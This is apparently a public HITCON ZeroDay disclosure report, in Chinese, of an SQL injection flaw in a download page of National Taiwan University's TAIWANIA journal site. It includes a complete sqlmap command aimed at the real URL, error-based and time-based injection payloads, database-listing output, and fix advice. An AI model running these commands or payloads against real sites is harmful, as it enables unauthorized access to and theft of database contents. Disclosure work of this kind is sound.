Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00353
- Vendor: 台灣大學
- Title: 台灣大學TAIWANIA期刊 網站存在 SQL Injection 漏洞
- Introduction: SQL Injection
處理狀態
目前狀態
公開
Last Update : 2021/08/30
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2021/06/30 05:16:32 : 新提交 (由 Thr3atHunt3r 更新此狀態)
- 2021/06/30 23:29:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/01 15:45:41 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/01 15:45:41 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/01 15:45:41 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/08/30 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00353
- 通報者:charlie301 (Thr3atHunt3r)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://taiwania.ntu.edu.tw/download.php?file=tai.2021.66.267.pdf&id=1
敘述
網站存在資料庫注入漏洞
使用弱掃工具 sqlmap 自動化執行:
sqlmap -u "https://taiwania.ntu.edu.tw/download.php?file=tai.2021.66.267.pdf&id=0" -p id --batch --dbs --random-agent
注入資訊:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: file=tai.2021.66.267.pdf&id=0' AND (SELECT 6099 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT(ELT(6099=6099,1))),0x7170707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sKrT
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: file=tai.2021.66.267.pdf&id=0' OR (SELECT 3293 FROM (SELECT(SLEEP(5)))gQaz)-- iOdY
---
證明:
available databases [5]:
[*] information_schema
[*] mysql
[*] ojs2
[*] performance_schema
[*] taiwania修補建議
1. 由使用者所帶入的值或變數(如:id、file 等),後端一定要做 sanitize。
2. 建議使用 prepare statement 對資料庫執行 CRUD。
3. 程式開發時應參考相關文件中的 "security best practice"。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。